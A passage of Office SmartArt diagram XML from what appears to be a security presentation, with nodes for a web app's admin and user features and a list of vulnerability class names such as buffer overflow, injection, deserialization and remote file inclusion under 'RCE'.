    <dgm:cxn modelId="{9DF1E1EE-2040-4C5F-9129-F65155CDB6F5}" type="presParOf" srcId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}" destId="{A6AC1673-F3EA-427B-BF28-953C6AC27FB3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{7760C1FF-C03D-4EB5-A9FA-E18CE93591FC}" type="presParOf" srcId="{126A8BE2-AF9F-42AC-AD3E-B77EC2EF8229}" destId="{DB861491-C94B-446F-BC15-56448202030E}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{015A6B9F-A3D8-4EBF-9F69-C3E0DB25424B}" type="presParOf" srcId="{DB861491-C94B-446F-BC15-56448202030E}" destId="{93B7F0A3-5CF4-44F3-A202-61506D047FF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy2"/>
    <dgm:cxn modelId="{FCD35D30-4769-45A0-B71E-810AE1C96E2B}" type="presParOf" srcId="{DB861491-C94B-446F-BC15-56448202030E}" destId="{7AF8CB9C-6D76-47ED-9ADE-249E647868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C893BA-D41D-448A-AA96-077984148B54}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/h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B08FDD-071B-416A-9905-D784C68C101B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Admin Page</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C98EDC1-CC68-4DA3-B9C5-CD1498F1DEA9}" type="parTrans" cxnId="{8B30D5AD-5A39-49C6-B56D-4109FD70BBD9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B8BF822B-B58E-4283-97DC-681F84487B59}" type="sibTrans" cxnId="{8B30D5AD-5A39-49C6-B56D-4109FD70BBD9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00CCA709-E246-4E69-A53B-2AB331DF116F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Content Management</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAA2D822-6628-491A-8263-1EE1FEFEC44F}" type="parTrans" cxnId="{EBED6058-E5E5-4BED-A31E-6418E1B0F457}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AEC3BB40-256F-435E-9B48-6FC97201DE6B}" type="sibTrans" cxnId="{EBED6058-E5E5-4BED-A31E-6418E1B0F457}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DA30064-07A9-495B-8999-D49526644DF4}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Role Management</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BB04923-0274-4C7C-947D-033DCF75EE84}" type="parTrans" cxnId="{66774EBF-0ABE-4895-A38C-3A7E23E09B28}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D20D83F6-40C4-4337-AD34-10FA8D03E6DB}" type="sibTrans" cxnId="{66774EBF-0ABE-4895-A38C-3A7E23E09B28}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27A7FD03-73BC-4993-8144-074CD8EB819B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>User Page</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{644DE703-6066-4DDE-9FFA-F5C8C03B5B85}" type="parTrans" cxnId="{50204CD1-4A8E-45D5-B8DB-B4B860370C0A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B000C04C-CF8E-403F-B897-9B625B4B6B9D}" type="sibTrans" cxnId="{50204CD1-4A8E-45D5-B8DB-B4B860370C0A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A04B1991-B397-4409-95D2-C15B3DBC58AC}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Comments</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1751E7A-0304-45D4-8FD6-EA1B20F1DB42}" type="parTrans" cxnId="{BEEA03F2-DD0B-40C3-97C2-A5CB352FBB00}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C74F8F3-2743-4251-BE8C-F7E307EE06E5}" type="sibTrans" cxnId="{BEEA03F2-DD0B-40C3-97C2-A5CB352FBB00}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AFD7A676-723D-429C-87B2-5809291AEC87}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Sharing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3E97D34-5E59-478C-8CAA-66F549C88AC9}" type="parTrans" cxnId="{2FC90A65-3E2B-41B7-8B42-1CEB8B6ED5D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48FFF6D4-669C-4EE3-80AB-7A0F45EBB0CA}" type="sibTrans" cxnId="{2FC90A65-3E2B-41B7-8B42-1CEB8B6ED5D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{768CCC92-C8E0-4203-9850-57E55093835D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Member Management</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{608E7C06-C824-4883-80D2-3FAE03D5EF6A}" type="parTrans" cxnId="{8FCD7719-22A9-4DBB-8601-A2B4203638DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86A561D1-DD41-40D3-A731-FB0C538531AE}" type="sibTrans" cxnId="{8FCD7719-22A9-4DBB-8601-A2B4203638DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A640F35-8890-4D35-956A-0412D50D83A4}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Comments</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85F446C3-C3DA-411C-AD48-9AC6776588F5}" type="parTrans" cxnId="{0B4DA92A-875D-41CB-8321-BD335D42E03A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C37AB78-324C-44DD-AA69-0AD0E77DA5EE}" type="sibTrans" cxnId="{0B4DA92A-875D-41CB-8321-BD335D42E03A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7110643B-A726-4ACE-AA13-1F72FC234208}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0"/>
            <a:t>Sharing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8794976C-619C-471A-95E4-E65C974221F1}" type="parTrans" cxnId="{FAB3424B-7F31-47AD-BBB5-549318209018}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3F1F2AA-D0C4-4761-9B0D-935C4C6D1F25}" type="sibTrans" cxnId="{FAB3424B-7F31-47AD-BBB5-549318209018}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4F92979-E6D8-492A-8DD9-30C6C8ABA9E4}" type="pres">
      <dgm:prSet presAssocID="{CAC893BA-D41D-448A-AA96-077984148B54}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63DAE747-BD7F-4F1D-A1F3-97C58346195D}" type="pres">
      <dgm:prSet presAssocID="{7FB08FDD-071B-416A-9905-D784C68C101B}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB7D9F7D-FC02-4DB8-9FE0-1E281F798643}" type="pres">
      <dgm:prSet presAssocID="{7FB08FDD-071B-416A-9905-D784C68C10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4C49B1-99EB-4133-AE78-688C44A3B2F2}" type="pres">
      <dgm:prSet presAssocID="{7FB08FDD-071B-416A-9905-D784C68C101B}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{478EB7DE-1D22-4CCF-B4FE-642A0D703598}" type="pres">
      <dgm:prSet presAssocID="{B8BF822B-B58E-4283-97DC-681F84487B59}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FDF4B8D9-DFEF-4B53-AE94-8CDFB556FAD6}" type="pres">
      <dgm:prSet presAssocID="{27A7FD03-73BC-4993-8144-074CD8EB819B}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8F7CBD5D-3937-4DA6-B12A-D501E46CB25E}" type="pres">
      <dgm:prSet presAssocID="{27A7FD03-73BC-4993-8144-074CD8EB819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9F5E6A5-E783-4AAC-9643-F4CEF2942515}" type="pres">
      <dgm:prSet presAssocID="{27A7FD03-73BC-4993-8144-074CD8EB819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985506-3CA2-4B3D-92BB-06F953EE0069}" type="presOf" srcId="{27A7FD03-73BC-4993-8144-074CD8EB819B}" destId="{8F7CBD5D-3937-4DA6-B12A-D501E46CB25E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{A77CC709-E7E9-4E36-A23C-AF61427553BC}" type="presOf" srcId="{7110643B-A726-4ACE-AA13-1F72FC234208}" destId="{244C49B1-99EB-4133-AE78-688C44A3B2F2}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{85813418-1B12-4842-8FC3-9C41D033919F}" type="presOf" srcId="{768CCC92-C8E0-4203-9850-57E55093835D}" destId="{244C49B1-99EB-4133-AE78-688C44A3B2F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{8FCD7719-22A9-4DBB-8601-A2B4203638DA}" srcId="{7FB08FDD-071B-416A-9905-D784C68C101B}" destId="{768CCC92-C8E0-4203-9850-57E55093835D}" srcOrd="2" destOrd="0" parTransId="{608E7C06-C824-4883-80D2-3FAE03D5EF6A}" sibTransId="{86A561D1-DD41-40D3-A731-FB0C538531AE}"/>
    <dgm:cxn modelId="{AE4EB325-C657-4A67-A7C8-C28141E55603}" type="presOf" srcId="{CAC893BA-D41D-448A-AA96-077984148B54}" destId="{D4F92979-E6D8-492A-8DD9-30C6C8ABA9E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{0B4DA92A-875D-41CB-8321-BD335D42E03A}" srcId="{7FB08FDD-071B-416A-9905-D784C68C101B}" destId="{3A640F35-8890-4D35-956A-0412D50D83A4}" srcOrd="3" destOrd="0" parTransId="{85F446C3-C3DA-411C-AD48-9AC6776588F5}" sibTransId="{0C37AB78-324C-44DD-AA69-0AD0E77DA5EE}"/>
    <dgm:cxn modelId="{2FC90A65-3E2B-41B7-8B42-1CEB8B6ED5D8}" srcId="{27A7FD03-73BC-4993-8144-074CD8EB819B}" destId="{AFD7A676-723D-429C-87B2-5809291AEC87}" srcOrd="1" destOrd="0" parTransId="{C3E97D34-5E59-478C-8CAA-66F549C88AC9}" sibTransId="{48FFF6D4-669C-4EE3-80AB-7A0F45EBB0CA}"/>
    <dgm:cxn modelId="{16203347-0EB8-4668-8BD0-686B21ED7B90}" type="presOf" srcId="{7FB08FDD-071B-416A-9905-D784C68C101B}" destId="{BB7D9F7D-FC02-4DB8-9FE0-1E281F798643}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{FAB3424B-7F31-47AD-BBB5-549318209018}" srcId="{7FB08FDD-071B-416A-9905-D784C68C101B}" destId="{7110643B-A726-4ACE-AA13-1F72FC234208}" srcOrd="4" destOrd="0" parTransId="{8794976C-619C-471A-95E4-E65C974221F1}" sibTransId="{E3F1F2AA-D0C4-4761-9B0D-935C4C6D1F25}"/>
    <dgm:cxn modelId="{0EED1D72-3CE4-43EB-85F2-8DD2AFB7EB66}" type="presOf" srcId="{2DA30064-07A9-495B-8999-D49526644DF4}" destId="{244C49B1-99EB-4133-AE78-688C44A3B2F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{EBED6058-E5E5-4BED-A31E-6418E1B0F457}" srcId="{7FB08FDD-071B-416A-9905-D784C68C101B}" destId="{00CCA709-E246-4E69-A53B-2AB331DF116F}" srcOrd="0" destOrd="0" parTransId="{FAA2D822-6628-491A-8263-1EE1FEFEC44F}" sibTransId="{AEC3BB40-256F-435E-9B48-6FC97201DE6B}"/>
    <dgm:cxn modelId="{BE49EC7F-3CA8-4018-A2CD-DF011E6DFCB1}" type="presOf" srcId="{00CCA709-E246-4E69-A53B-2AB331DF116F}" destId="{244C49B1-99EB-4133-AE78-688C44A3B2F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{8B30D5AD-5A39-49C6-B56D-4109FD70BBD9}" srcId="{CAC893BA-D41D-448A-AA96-077984148B54}" destId="{7FB08FDD-071B-416A-9905-D784C68C101B}" srcOrd="0" destOrd="0" parTransId="{8C98EDC1-CC68-4DA3-B9C5-CD1498F1DEA9}" sibTransId="{B8BF822B-B58E-4283-97DC-681F84487B59}"/>
    <dgm:cxn modelId="{7B661ABC-E67D-4BF3-9CF5-7A965150B508}" type="presOf" srcId="{A04B1991-B397-4409-95D2-C15B3DBC58AC}" destId="{29F5E6A5-E783-4AAC-9643-F4CEF2942515}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{66774EBF-0ABE-4895-A38C-3A7E23E09B28}" srcId="{7FB08FDD-071B-416A-9905-D784C68C101B}" destId="{2DA30064-07A9-495B-8999-D49526644DF4}" srcOrd="1" destOrd="0" parTransId="{4BB04923-0274-4C7C-947D-033DCF75EE84}" sibTransId="{D20D83F6-40C4-4337-AD34-10FA8D03E6DB}"/>
    <dgm:cxn modelId="{4C6675C1-071D-4F26-ABE5-ABEB63F5C06A}" type="presOf" srcId="{3A640F35-8890-4D35-956A-0412D50D83A4}" destId="{244C49B1-99EB-4133-AE78-688C44A3B2F2}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{50204CD1-4A8E-45D5-B8DB-B4B860370C0A}" srcId="{CAC893BA-D41D-448A-AA96-077984148B54}" destId="{27A7FD03-73BC-4993-8144-074CD8EB819B}" srcOrd="1" destOrd="0" parTransId="{644DE703-6066-4DDE-9FFA-F5C8C03B5B85}" sibTransId="{B000C04C-CF8E-403F-B897-9B625B4B6B9D}"/>
    <dgm:cxn modelId="{BEEA03F2-DD0B-40C3-97C2-A5CB352FBB00}" srcId="{27A7FD03-73BC-4993-8144-074CD8EB819B}" destId="{A04B1991-B397-4409-95D2-C15B3DBC58AC}" srcOrd="0" destOrd="0" parTransId="{B1751E7A-0304-45D4-8FD6-EA1B20F1DB42}" sibTransId="{6C74F8F3-2743-4251-BE8C-F7E307EE06E5}"/>
    <dgm:cxn modelId="{458CD7FC-E04A-4A12-A229-52FD58514F73}" type="presOf" srcId="{AFD7A676-723D-429C-87B2-5809291AEC87}" destId="{29F5E6A5-E783-4AAC-9643-F4CEF2942515}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{5215F2E8-91F3-4445-8FBF-726E4933B74D}" type="presParOf" srcId="{D4F92979-E6D8-492A-8DD9-30C6C8ABA9E4}" destId="{63DAE747-BD7F-4F1D-A1F3-97C58346195D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{0A45CD1D-84DD-4E53-AACF-FEAE61CA4ECF}" type="presParOf" srcId="{63DAE747-BD7F-4F1D-A1F3-97C58346195D}" destId="{BB7D9F7D-FC02-4DB8-9FE0-1E281F798643}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{5B9DE9D5-5DC7-4243-9C31-BF4BCCB5ABEC}" type="presParOf" srcId="{63DAE747-BD7F-4F1D-A1F3-97C58346195D}" destId="{244C49B1-99EB-4133-AE78-688C44A3B2F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{846FD990-2E42-41D4-ABC2-E158B3F7FF43}" type="presParOf" srcId="{D4F92979-E6D8-492A-8DD9-30C6C8ABA9E4}" destId="{478EB7DE-1D22-4CCF-B4FE-642A0D703598}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{6B973F88-5BE1-47CF-8B52-7DEF9EF5DC35}" type="presParOf" srcId="{D4F92979-E6D8-492A-8DD9-30C6C8ABA9E4}" destId="{FDF4B8D9-DFEF-4B53-AE94-8CDFB556FAD6}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{5565D0B1-0ED2-412F-98C5-314832D63D3E}" type="presParOf" srcId="{FDF4B8D9-DFEF-4B53-AE94-8CDFB556FAD6}" destId="{8F7CBD5D-3937-4DA6-B12A-D501E46CB25E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{B2AB239A-314C-40F7-8B4E-425FB55B9FB5}" type="presParOf" srcId="{FDF4B8D9-DFEF-4B53-AE94-8CDFB556FAD6}" destId="{29F5E6A5-E783-4AAC-9643-F4CEF29425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967311-6D61-419F-9D1E-2FD24BA970D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A967E33-D1B5-40E1-82CA-F63E104735F1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>RCE</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{236D3005-FFD4-4A93-B2D8-3C5EBE1215C1}" type="parTrans" cxnId="{42F1B6F9-5250-4E16-A690-35355580B073}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{868D5A9C-7157-4C49-9DBA-5783E98738B9}" type="sibTrans" cxnId="{42F1B6F9-5250-4E16-A690-35355580B073}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75B10601-D994-4AE8-AA18-8920266BA425}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Buffer Overflow</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2A1280C-8FFB-4443-8F2D-E3F3C502ECA7}" type="sibTrans" cxnId="{817DBB71-A9F5-4451-B0F2-406ECB3E4A42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7AA7D8F-70B0-47A8-A4AB-B2255B90FBCD}" type="parTrans" cxnId="{817DBB71-A9F5-4451-B0F2-406ECB3E4A42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C409427F-3D2D-45C1-984C-D5A48177A1BE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{960580DD-E68D-4136-A8D7-33F604C7C107}" type="sibTrans" cxnId="{8466B441-0319-4C5E-9209-915D7A4788D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72054474-C049-487D-AEE2-C163A071DF92}" type="parTrans" cxnId="{8466B441-0319-4C5E-9209-915D7A4788D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6371E9DA-FB0B-4721-A273-13440CE6AA18}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Deserialization Vulnerability</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DD7E52A-DAE4-4679-BFE8-C72CE5091204}" type="sibTrans" cxnId="{FCE41792-7E4D-4C9A-A0D5-FDED35E7BBF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84F80D6F-44F9-4143-AF83-8BFB13F0A8BA}" type="parTrans" cxnId="{FCE41792-7E4D-4C9A-A0D5-FDED35E7BBF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{371B02C2-F95B-44A8-BAA0-5568C052449B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>File Upload RCE</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9EE820CD-F6AF-4FD9-A491-35E29AB264DA}" type="parTrans" cxnId="{CE22CBEA-EBFB-498C-8919-8BE67DBBFD90}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13321D8D-5EE7-4715-AB41-B0A24FFB7390}" type="sibTrans" cxnId="{CE22CBEA-EBFB-498C-8919-8BE67DBBFD90}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C25B1FAF-EBF9-4076-AA5B-738FDBD5BD89}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0"/>
            <a:t>Remote File Inclusion (RFI)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
